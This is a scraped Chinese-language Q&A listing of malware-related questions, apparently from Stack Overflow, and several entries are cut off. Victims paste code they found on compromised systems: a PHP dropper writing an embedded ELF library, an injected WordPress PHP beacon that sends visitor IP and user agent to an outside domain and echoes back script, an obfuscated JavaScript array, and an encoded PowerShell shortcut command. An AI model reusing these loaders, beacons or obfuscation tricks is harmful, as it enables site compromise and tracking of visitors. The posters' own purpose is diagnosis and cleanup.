我试图寻找一个解决方案,但是还没有能够这样我认为我会开始一个新的问题.
我想要做的是还原在特定日期编辑过的文件,以恢复到之前的版本.原因是我的计算机上发现了一个恶意软件,它已经加密了我的所有文件.由于我在桌面上运行了Google云端硬盘应用程序,恶意软件加密了这些文件,谷歌云端硬盘已将其同步到云端......所以目前我在Google云端硬盘中有一堆损坏的文件.
我可以进入每个文件手动"管理修订版"并将其恢复为工作版本,但由于文件数量的原因,这需要花费数小时的时间.
我已经完成了有关可能会被使用的Google Drive API的阅读,但我不是专家程序员,所以我想问一下是否有人有任何建议/知道解决此问题的最佳方法.
干杯,阿尔弗雷德
所以我不久前被黑了,现在我的文件管理器中有一个奇怪的PHP文件.这是它的内容:
<?php
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", …Run Code Online (Sandbox Code Playgroud) 昨天我安装了几个过时的插件(我的坏),以便让我的buddressress注册页面显示"条款和条件"复选框,从那时起,所有页面和帖子开始在开头和底部显示一些不需要的文本.
我删除了所有这些插件但仍然收到了消息.我尝试了几个恶意软件扫描程序,如wordfence,sucuri等,但一切都说我的网站很干净.我现在没有选择了.请帮我摆脱我的网站.
在页面开始时,此代码出现:
<div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="http://dlwordpress.com/">Free WordPress Themes</a> and plugins.</div>`
Run Code Online (Sandbox Code Playgroud)
在页面结束之前,此代码出现:
<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="https://dlandroid24.com/">Free Android Games</a> and apps.</div>
Run Code Online (Sandbox Code Playgroud)
正如您所看到的,由于left:-9999px;上述代码中的文本通常不可见,但可以看到搜索引擎结果和社交共享.
我正在寻找一种编程链接扫描解决方案。有许多家用软件包可以扫描搜索结果页面上的网址并验证这些网站上没有恶意软件,但我正在寻找一款可以通过编程方式执行此操作的软件。我希望能够向代码提供一个网址,让它执行远程请求并扫描网页以查找恶意软件。
以前有人遇到过类似的事情吗?
任何人都可以解码吗?我尝试了所有的js foo,看了jsunpack并且无法弄明白.被列入黑名单的网站有这个,所以我认为这是罪魁祸首.
<script type="text/javascript">
a = Array('c4v4', 'I', ' wid', 'rxkQ', 's', 'te', 'ZHA', 'px;', 'u', 'A', 'yle=', 'V', ' le', 'px', 'ht: ', ': a', '0', ' s', 'ig', 'o', '; he', 'ft:', 'ion', 'idde', '00px', 'NI', 'I', ' ', 'kB', 'n;\"', '6Ms', '\"po', '20', 'Mh', 'l', 'th: ', 'H', 'ver', 'x; o', '-2', 'low', 'f', '</di', 'v>', '>', 'wri', 'H0d', '<div', 'x', 'to', '1', 'U', 'te; ', ': h', '200', 'LL9', 'p: ', '-', ';', 'l', 't', 'jZ', …Run Code Online (Sandbox Code Playgroud) Avast偶尔会出现在我的一个网站上.有点奇怪,因为我对安全性非常严格,但我检查了index.php文件和所有相关的包含和脚本.在我删除的"header.php"文件中找到了一些奇怪的PHP代码.
今晚,avast再次出现,尽管我的FTP数据显示该文件"自我修复后仍未编辑",但代码仍在那里.我现在已经更改了密码和所有内容.
这是有问题的PHP代码,任何建议都会对这是多么好!
<?php
$wp_bskr = 'inf';
$wp_tcc = 'template';
error_reporting(0);
ini_set('display_errors',0);
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_hrmr) && !preg_match ('/bot/i', $wp_hrmr))) {
$wp_drss="http://".$wp_tcc.$wp_bskr.".com/".$wp_bskr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hrmr);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_wvw,1,3) === 'scr' ) {
echo $wp_wvw;
}
?>
Run Code Online (Sandbox Code Playgroud)
*********更新************
感谢esqew更深入地研究这个并在您的博客文章中提供详细信息.可怕的东西确实.在我的最后得到了一些更新.
首先,使用avast日志(从我的网站检测到有恶意软件时),通过谷歌进行一些搜索,我发现了另一个非常相似的代码示例,并且我的终端上的avast标记的IP地址与此帖子相匹配.这里提供了一些信息来缩小范围:恶意软件 - 流量分析.n*t/2014/05/11/index.html.无论如何,我认为那是帖子.论坛的新手,不确定我是否可以发布链接,所以我已经出演了"net"tld.
从那里,我拿了匹配的IP,一个包含javascript的url,whois'd并将所有信息传递给注册商.他们从他们的结尾看了一眼,并确认有恶意事件发生在我的惊讶之中,在一小时内回复并暂停了域名并且所有人都连接到了这个IP.
其次,我的webhost发现他们认为泄漏是如何实现的.在没有给出完整的详细信息的情况下,我意识到我有一个旧的wordpress安装(旧的我的意思是,我多年没有使用和忘记的一个,自2010年以来没有更新,所以我认为容易受到攻击).从他们的日志看起来,这似乎是我的服务器的方式,因为我没有安装其他脚本.几天前,我更改了所有密码并完全删除了WP,因为它已不再使用,目前看来还不错.
我正在分析一个可执行文件的格式,在中找到了基本重定位表image_optional_header,这个基本重定位表是什么?
windows reverse-engineering malware malware-detection visual-c++
我下载了一个文件,我几乎没有考虑过,但目标(快捷方式)引起了我的注意:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
Run Code Online (Sandbox Code Playgroud)
毫无疑问,这里发生了一些可疑的事情.我理解前三个参数,但我无法弄清楚这样的有效载荷代码如何在一个基本的快捷方式中起作用?
从今天早上开始,我开始注意到我的 Linux/mageia 6 运行缓慢。
我top以 root 用户身份使用command进行检查,发现名为xm64running as invitadouser(西班牙语中的来宾用户)的进程使用了我的 CPU 的 755%。
我杀了好几次这个过程,它突然又开始了。可疑的是没有人以访客用户(invitado)身份登录,计算机的唯一真实用户是我。
作为invitado我的客人在我家时的帐户,我决定在再次终止xm64进程之前删除该用户。
删除该用户后,xm64进程再也没有出现。
我使用 /var/log 搜索了 xm64 信息,grep -ri xm64 /var/log但没有找到。
现在我正在安装clamav,maldetect以便搜索信息。
我在谷歌上搜索,我没有发现与xm64 linux相关的任何内容,但是当我只查找xm64 时,我发现了有关 Windows XM64.EXE 上的木马病毒的信息。
这是我开始使用 Linux 25 年来第一次怀疑我的 Linux 机器被感染了。
我责怪自己,因为我使用字典密码创建了那个访客用户……我保证再也不会这样做了。
谁能确认我这是 Linux 上的恶意软件还是另一个问题?
我从 useragent“stagefright”收到以下请求,要求访问 Web 文件夹中的一些 mp3 文件,IP 恰好是唯一的,但文件名总是重复的(正在请求大约 15 个文件),而且这些大多来自较旧的 Android 版本设备,但现在我也注意到了 Android 10。
我已经使用 .htaccess 阻止了对用户代理“stagefright”的访问,但是当它引起我的注意时,它已经消耗了大量的带宽,我并没有被它困扰,因为它返回 403 但有人可以对这些类型进行一些说明吗请求数?这种情况已经持续了一年多,并且仅针对 MP3 文件请求。
此外,在一秒钟内会出现多次对同一文件的突发请求。请参阅下面的日志摘录。
84.65.126.81 - - [23/Apr/2020:15:53:37 +0400] "GET /xxx.mp3 HTTP/1.1" 403 221 "-" "stagefright/1.2 (Linux;Android 10)"
47.184.9.3 - - [23/Apr/2020:15:53:37 +0400] "GET /xxx.mp3 HTTP/1.1" 403 227 "-" "stagefright/1.2 (Linux;Android 8.1.0)"
73.90.23.108 - - [23/Apr/2020:15:53:37 +0400] "GET /SS007.mp3 HTTP/1.1" 403 227 "-" "Samsung SM-T350 stagefright/Beyonce/1.1.9 (Linux;Android 7.1.1)"
47.184.9.3 - - [23/Apr/2020:15:53:37 +0400] "GET /SS043.mp3 HTTP/1.1" 403 227 "-" "stagefright/1.2 (Linux;Android 8.1.0)"
84.65.126.81 …Run Code Online (Sandbox Code Playgroud) malware ×10
php ×2
security ×2
android ×1
apache ×1
exploit ×1
javascript ×1
linux ×1
mageia ×1
obfuscation ×1
powershell ×1
stagefright ×1
visual-c++ ×1
windows ×1
wordpress ×1